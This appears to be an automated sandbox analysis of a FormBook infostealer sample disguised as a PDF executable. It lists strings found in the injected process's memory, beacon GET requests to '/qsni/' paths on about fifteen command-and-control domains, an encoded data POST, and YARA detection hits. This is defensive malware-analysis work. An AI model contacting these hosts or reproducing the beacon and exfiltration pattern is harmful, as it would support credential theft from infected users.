          Source: rundll32.exe, 0000000E.00000002.778641956.0000000005CF8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6r
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000005842000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000051FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.pgatraining.com/qsni/?C6=ylLL
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.safedog.cn
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricofreight.co.uk/wp-content/uploads/2016/01/trico_logo-2.jpg
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/agb/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/ant-virus-for-free-what-you-need-to-know/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/blog/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/comments/feed/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/contact-us/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/cookie-policy/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/determing-the-best-document-management-computer-software/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/feed/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/help-faq/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/ideal-data-room-review-what-you-need-to-know/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/impressum/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/packing-cases/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/payments/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/promotions/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/rates/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/rates/sea-air-services-to-other-countries/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/rates/sri-lanka-freight-cost/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/register/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/air/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/commercial/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/export/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/import/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/quotation/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/services/sea/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/the-best-vpn-meant-for-android/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/what-to-look-for-in-a-digital-data-room/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/cookie-notice/css/front.css?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/cookie-notice/js/front.js?ver=1.2.34
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/custom-registration-form-builder-with-submission-mana
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/css/style.css?ver=2.0.5
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/fontastic/styles.css?ver=2.0
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/js/ditty-news-ticker.js?ver=
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/js/jquery.easing.1.3.js?ver=
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/ditty-news-ticker/assets/js/jquery.touchSwipe.min.js?
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/login-with-ajax/widget/login-with-ajax.js?ver=3.1.5
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/login-with-ajax/widget/widget.css?ver=3.1.5
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/css/bootstrap-front
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/css/font-awesome/cs
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/js/accordion.js?ver
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-accordion-and-collapse/js/bootstrap.js?ver
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-tabs/css/rtbs_style.min.css?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/plugins/responsive-tabs/js/rtbs.js?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/3dcarousel.css
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/fonts/font-awesome.min.css?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/img/partner_dhl_logo.jpg
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/img/partner_trico.jpg
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/3dcarousel.js
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/craftmap.js
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/ie/html5.js
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/ie/respond.js
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/ie/selectivizr.js
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/jquery.flexslider.min.js?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/js/scripts.js?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/responsive.css?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-content/themes/hueman/style.css?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-includes/js/jquery/jquery.js?ver=1.11.3
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-includes/js/wp-embed.min.js?ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-includes/wlwmanifest.xml
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-json/
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-login.php
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-login.php?action=lostpassword
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/wp-login.php?action=register
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/xmlrpc.php
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoshipping.de/xmlrpc.php?rsd
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.tricoworld.com/cargo-tracking.php
          Source: 3_45586pY.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
          Source: 3_45586pY.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 3_45586pY.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 3_45586pY.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 3_45586pY.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.smirnovmir.online&rand=
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
          Source: 3_45586pY.14.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: 3_45586pY.14.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: 3_45586pY.14.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: 3_45586pY.14.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000059D4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000059D4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000059D4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois?currency=SEK&lang=sv
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000059D4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
          Source: 3_45586pY.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?hl=en-GB&#038;ver=4.4.2
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000064D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.goosedigitals.com/qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM
          Source: rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.778641956.0000000005B66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/solscape.org?utm_source=Sedo_parked_page&utm_medium=button&utm_cam
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.smirnovmir.online&utm_medium=parking&utm_campaign=s_lan
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.smirnovmir.online&utm_medium=parking&utm_campaign=s_la
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.smirnovmir.online&utm_medium=parking&utm_campaign=s_land_
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.smirnovmir.online&utm_medium=parking&utm_campaign=s_lan
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.smirnovmir.online&utm_medium=parking&ut
          Source: rundll32.exe, 0000000E.00000002.778641956.00000000061AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.smirnovmir.online&amp;reg_source=parking_auto
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000005B66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php
          Source: rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.778641956.0000000005B66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknownHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.deconsurveys.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.deconsurveys.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deconsurveys.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 37 71 30 52 63 6a 61 36 39 4e 5f 6a 47 79 67 46 4b 54 67 54 36 44 61 64 56 68 4b 68 75 76 37 46 55 6c 4a 41 59 70 6a 59 73 41 72 46 43 4c 35 30 69 75 32 63 4f 31 77 4b 45 6e 69 4e 79 52 57 6a 44 4c 66 75 6a 4e 67 72 6e 43 49 46 67 47 7a 52 58 56 59 42 47 63 61 28 43 36 4f 52 54 41 39 51 64 6a 7a 7e 36 38 45 5a 78 36 73 75 5f 6a 4b 45 2d 76 36 44 2d 76 6c 57 4d 74 65 49 67 56 6f 7a 58 73 75 28 4f 51 49 48 76 30 34 55 45 41 64 39 41 68 43 6f 48 57 39 74 78 47 58 38 71 54 55 61 4b 46 56 65 42 4d 55 39 48 51 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=hhrrKzuTFil2V7q0Rcja69N_jGygFKTgT6DadVhKhuv7FUlJAYpjYsArFCL50iu2cO1wKEniNyRWjDLfujNgrnCIFgGzRXVYBGca(C6ORTA9Qdjz~68EZx6su_jKE-v6D-vlWMteIgVozXsu(OQIHv04UEAd9AhCoHW9txGX8qTUaKFVeBMU9HQ.
          Source: unknownDNS traffic detected: queries for: www.studioweiden.click
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1Host: www.studioweiden.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1Host: www.deconsurveys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1Host: www.pgatraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=/CUbeLGdGW7zl6Yrg3szV70J26SXMoQ2pfYL+bcx2mg0PIzThOL5knKcXzWm1tDlAVZWmNl686ZiGeZ8WLzQG28uiNuGoArcmZEyTk8QSRXO&ZOm=dXna0d HTTP/1.1Host: www.dammar.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3P HTTP/1.1Host: www.no-leaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0d HTTP/1.1Host: www.lozpw.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=2dXT+4Ai7ZbPKYl8drSkrCy2lxkaNy55YxFVHbvYyUio5rd6lf6SLF0ob3hHEU1U1UadvRiDLVbZ/zXRgBVvecK7bXV6D842o39gH3q8FOBk HTTP/1.1Host: www.paystiky.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=EdJnJU/lhOYEhE9BO9NphGlO3QLRR4S2ZfetV970kfyK3r0VSOQZIVbRZ1Rh/wTR4QMpun6FHmi+ja6D1wHWvgz/qr6+Lt4m8nQxrZSCvu65&ZOm=dXna0d HTTP/1.1Host: www.coolconnect.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=7H8xSIW5MLqIY53/LGllmkoRmNfLQ4PxXJLF+jC+GuEFiwPgygLyspGMipLnk+o+jVAb/2fizt6b+gypwGaXqyig7aE98woG1OMKQE7sGn5L HTTP/1.1Host: www.solscape.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0d HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=xN2Ykcx+dVxWXpEVy0UIOF/PMPW6GcpN8TjIanJ5/1roRjTsXtyK1vSqyqsFx56l6NugQvTefoOMKvMnzU7TqfIAwz99vX70dq+IkxJCDx9y HTTP/1.1Host: www.wellblech.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=6t2Q7SeAwLmQNelBXDLKo9qpSU1icepMxITYi6227y8BkUMVt16o9uBaj3iomGvWgYEbJgVfO4tURjyhVEwFkTJljUaU+RSQoO9JU52yJaZ7&ZOm=dXna0d HTTP/1.1Host: www.laksiricargo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=FgfvfbKMco1hm4BTaSRmeVKlkqqq28/f/j0nkdrPBpFMczuiiIeBX6QaoIVtcG6Y6TumCsRXLbRUzhWAbp/pDAVUj4gCTuO332taxWtVavyG HTTP/1.1Host: www.smirnovmir.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=QfEH2LlQJkhao1qhydFpLuO03+YyqoCU3gb+yzoLlx0bdVzB1Ri3UMkYiWEqIQkbZVoV1sjk8Mu+D1IodnZSi5GE+4Z2R1bARZG0EKwNnHKl&ZOm=dXna0d HTTP/1.1Host: www.eylien.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqa HTTP/1.1Host: www.goosedigitals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=p8pgVrFU0KaM67LkG2/HXLDeB7IL2n51le4JMrfTj7FohhyzYrH8fXmJIvaeotiFFl2VJ/RpY5m/lS8/GyXuRg8EnyJC/Fp8bjDJ/ib+v4lR&ZOm=dXna0d HTTP/1.1Host: www.hexiemoju.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1Host: www.studioweiden.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1Host: www.deconsurveys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1Host: www.pgatraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: gkvlc.exe, 00000001.00000002.265296060.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
